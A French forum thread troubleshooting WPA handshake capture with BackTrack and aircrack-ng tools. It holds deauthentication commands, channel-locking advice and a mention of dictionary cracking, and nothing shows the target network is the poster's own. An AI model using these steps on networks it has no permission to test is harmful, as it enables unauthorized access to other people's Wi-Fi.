Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-12-2008 01:02:05

dino6969
Membre
Inscription : 30-12-2008
Messages : 24

probleme capture WPA handshake avec backtrack 2

bonsoir

mon probleme est le suivant je lance le live cd ...
je capte des reseaux 5 ou 6
j'arrive a avoir un reseau qui se connecte
je lance des attaques  avec airplay-ng a repetition et j'ai des paquets qui monte exemple en 50 minutes 100.00  paquet. mais toujours pas de capture de handshake.
ce que j'ai remarque aussi c'est que les collones avant  celle des paquets monte mais redesende a zero et redemarre tout le temps...
je presise que je suis avec un pakard belle avec carte atheros
d'ou viendrai le probleme?


jpeu pas baisser mon froc , jvai faire tomber mon glock

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-12-2008 13:30:29

Mr. M
Membre d'honneur
Inscription : 29-10-2008
Messages : 1 036

Re : probleme capture WPA handshake avec backtrack 2

Salut, alors dis moi la qualité de reception ( RXQ et PWR) c'est très important pour la capture d'un hanshake. ensuite es-tu sur que ta carte supporte l'injection de paquets et que tes Déauth fonctionnent ??? si tu peux balancer une capture d'écran se serait cool : Shell de aireplay-ng, de airodump-ng et de ton airmon-ng.  Les infos de ta carte pour savoir si elle bascule bien en monitor. Ensuite saches que la capture d'un hanshake peut-être fastidieuse ( plusieurs heures et pas mal de déauth ) ou alors immédiate sans même balancer de déauth ( ça m'est arrivé) Voili voilou ! tongue


footer.jpg

Hors Ligne

#3 30-12-2008 13:32:54

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : probleme capture WPA handshake avec backtrack 2

Salut dino6969, bienvenue sur le forum wink

Bon, on récapitule. Tu cherches donc à capturer un handshake pour cracker du WPA en utilisant un live cd... On a besoin de davantage de renseignements pour comprendre ce qui ne va pas et t'aider au mieux. Tu peux poster sur le forum des captures d'écran, ou bien copier et coller ce qui se passe dans tes shells. Quelles commandes utilises tu? Qu'est ce qui se passe quand tu lances tes commandes?

Tu parles de paquets qui montent, mais dans le cas du crack WPA, cela n'a aucun intéret... Lis, et relis plusieurs fois le Tutoriel sur le crack de clé WPA jusqu'à ce que tu aies bien compris toutes les étapes smile

Hors Ligne

#4 31-12-2008 17:04:54

dino6969
Membre
Inscription : 30-12-2008
Messages : 24

Re : probleme capture WPA handshake avec backtrack 2

salut merci de  vos reponde alors voila dans un premier temps
airodump-ng --encrypt wpa ath2 pour voir les reseau
mon pwr est 19
mon rxq est a 0
amis des fois il monte a 100 et le pwr mon a 50


pour ce qui est des shelle ca donne ca

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  attack modes (Numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen

No replay interface specified.
bt ~ #                                         

ensuite airmon-ng
bt ~ # airmon-ng


Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
ath2            Atheros         madwifi-ng VAP (parent: wifi0)

airodump-ng
Airodump-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org

  usage: airodump-ng <options> <interface>[,<interface>,...]

  Options:
      --ivs               : Save only captured IVs
      --gpsd              : Use GPSd
      --write    <prefix> : Dump file prefix
      -w                  : same as --write
      --beacons           : Record all beacons in dump file
      --update     <secs> : Display update delay in seconds
      --showack           : Prints ack/cts/rts statistics
      -h                  : Hides known stations for --showack
      -f          <msecs> : Time in ms between hopping channels
      --berlin     <secs> : Time before removing the AP/client
                            from the screen when no more packets
                            are received (Default: 120 seconds).
      -r           <file> : Read packets from that file

  Filter options:
      --encrypt   <suite> : Filter APs by cipher suite
      --netmask <netmask> : Filter APs by mask
      --bssid     <bssid> : Filter APs by BSSID
      -a                  : Filter unassociated clients

  By default, airodump-ng hop on 2.4Ghz channels.
  You can make it capture on other/specific channel(s) by using:
      --channel <channels>: Capture on specific channels
      --band <abg>        : Band on which airodump-ng should hop
      -C    <frequencies> : Uses these frequencies in MHz to hop
      --cswitch  <method> : Set channel switching method
                    0     : FIFO (default)
                    1     : Round Robin
                    2     : Hop on last
      -s                  : same as --cswitch

      --help              : Displays this usage screen

No interface specified.

voila bon j'ai donc un packard bel avec une pci atheros ar 5006 et l'autre pc a aussi uen carte atheros ar5007
j'ai une cle netgear wg 111 v3 acheter aujourd'hui sous windows elle fonctionne mais des que je lance backtrack 3 via l'iso  sur aucun des deux pc elle va................... probleme de plus
mais bon j'ai lu que normalement mais deux cartes atheros etait compatible avec backtrack 3

je commence toujours par iwconfig
airmon-ng start wifi0
il me dit que ma carte est ennable ath1
airdodump-ng --encrypt wpa ath1
airodump-ng -w out --encrypt wpa -c 6 (le chanel ou se trouve le reseau) --bsssid du reseau ath1
ensuite j'ouvre un nouveau shell (2)
aireplay-ng -0 0 -a bssid du reseau -c bssid mac ath1
ensuite j'ouvre shell (3)
aireplay-ng -0 0 -a  bssid reseau ath1
je lance les 2 shelle et je laisse le shell de depart actif je ne fait pas ctrl-c
donc j'ai toujours mes 3 shell devant moi
et la et bien les paquet grimpe tranquille
mais les #/s ne monte pas dut out


voila une idee??? et bonne fetes a vous


jpeu pas baisser mon froc , jvai faire tomber mon glock

Hors Ligne

#5 31-12-2008 17:48:51

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : probleme capture WPA handshake avec backtrack 2

Ok, alors voila ce que j'en pense:

dino6969 a écrit :

je lance les 2 shelle et je laisse le shell de depart actif je ne fait pas ctrl-c

Pour capturer le handshake il faut que tu arrettes la déauth au bout d'un moment, sinon le client ne pourra pas se reconnecter et tu ne captureras rien.

dino6969 a écrit :

et la et bien les paquet grimpe tranquille
mais les #/s ne monte pas dut out

Mais qu'est ce que tu appelles les "paquet"? Dans le cas de la capture d'un handshake, on ne cherche pas à faire grimper les #datas comme pour du crack WEP, ici le but est de déconnecter le client afin de capturer le handshake lorsqu'il va se reconnecter.

Tu n'as pas précisé quelle était la qualité du signal wifi lorsque tu lances airodump-ng sur la cible, hors c'est l'élément le plus important lors d'une attaque de ce type. Regardes le chiffre dans la colonne "rxq", il reflète la qualité du signal wifi, si il est en dessous de ~ 50 60 ce n'est meme pas la peine d'essayer quoi que ce soit, la déauth ne fonctionnera pas. Utilises la fonction recherche du forum, tu verras qu'on a déja pas mal de discuté de problèmes similaires, cela devrait pouvoir t'aider. Bonnes fetes de fin d'année à toi aussi smile

Hors Ligne

#6 31-12-2008 18:37:42

dino6969
Membre
Inscription : 30-12-2008
Messages : 24

Re : probleme capture WPA handshake avec backtrack 2

ok mais si je ferme le death je fait ctr+c et puis apres 1min je relance la commande airdump-ng -w out --encrypt.............?  les paquest c'est la collone paquets dans backtrack


jpeu pas baisser mon froc , jvai faire tomber mon glock

Hors Ligne

#7 31-12-2008 18:39:36

dino6969
Membre
Inscription : 30-12-2008
Messages : 24

Re : probleme capture WPA handshake avec backtrack 2

paquet c'est la colonne packets et les colonne juste avant augmente et retombe a zero sans s'arreter


jpeu pas baisser mon froc , jvai faire tomber mon glock

Hors Ligne

#8 01-01-2009 11:40:22

dino6969
Membre
Inscription : 30-12-2008
Messages : 24

Re : probleme capture WPA handshake avec backtrack 2

salut hier soir j'ai reussi par contre les dictionnaire que j'ai utilise non pas reussi a casse la clef
mais probleme aujourd'hui matien apres avoir fait ma commande pour ecouter le reseau
en haut a droit il est marque fixed channel ath1
alors que ej demande dans ma commande qu'il ecoute le channel 11 pourquoi fait il ca?
cxa ren plus vu qu'ils e fixe sur le channel 1 je perd toute ecoute de reseau????????????
et bonne annee


jpeu pas baisser mon froc , jvai faire tomber mon glock

Hors Ligne

#9 01-01-2009 14:29:48

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : probleme capture WPA handshake avec backtrack 2

Tu as réussi à capturer le handshake? Félicitations big_smile Tu vois, il ne faut pas brusquer les choses, en y allant par étapes tu commences à mieux maitriser le truc...

Pour ton problème de "fixed channel", tu devrais essayer de verrouiller la carte sur le canal que tu cibles dès le lancement d'airmon-ng, comme ceci (avec wifi0 comme carte "mère", vu que tu utilises apparemment de l'atheros):

airmon-ng start wifi0 11

Ici la carte sera verrouillée sur le canal 11 par exemple, dès le passage en mode monitor. L'interface "fille" ath1 qui sera créée devrait donc etre bloquée sur le canal 11. J'en profite pour te dire que ath1 est le nom de l'interface, cela ne signifie pas que le scan se fait sur le canal 1...

Utilises la fonction recherche, on avait déja discuté d'un problème similaire sur le forum il me semble.

Au fait... Bonne année smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.045 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]